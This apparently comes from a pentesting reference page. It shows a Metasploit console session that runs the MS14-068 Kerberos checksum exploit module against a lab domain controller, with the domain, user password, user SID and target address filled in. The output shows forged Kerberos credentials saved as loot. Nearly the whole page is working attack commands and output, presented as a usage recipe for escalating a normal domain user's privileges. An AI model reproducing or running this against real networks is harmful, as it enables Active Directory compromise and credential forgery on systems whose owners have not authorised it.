MSF / MS14-068

msf auxiliary(ms14_068_kerberos_checksum) > show options

Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

   Name      Current Setting                               Required  Description
   ----      ---------------                               --------  -----------
   DOMAIN    exploit.local                                 yes       The Domain (upper case) Ex: DEMO.LOCAL
   PASSWORD  ASDqwe123                                     yes       The Domain User password
   RHOST     172.16.102.15                                 yes       The target address
   RPORT     88                                            yes       The target port
   Timeout   10                                            yes       The TCP timeout to establish connection and read data
   USER      notanadmin                                    yes       The Domain User
   USER_SID  S-1-5-21-3211488530-130973289-431960246-1104  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

msf auxiliary(ms14_068_kerberos_checksum) > run

[*] Validating options...
[*] Using domain EXPLOIT.LOCAL...
[*] 172.16.102.15:88 - Sending AS-REQ...
[*] 172.16.102.15:88 - Parsing AS-REP...
[*] 172.16.102.15:88 - Sending TGS-REQ...
[+] 172.16.102.15:88 - Valid TGS-Response, extracting credentials...
[+] 172.16.102.15:88 - MIT Credential Cache saved on /Users/mubix/.msf4/loot/20151027020652_default_172.16.102.15_windows.kerberos_005780.bin
[*] Auxiliary module execution completed
Want to contribute? Get in touch!
Last updated on 5th Jul 2017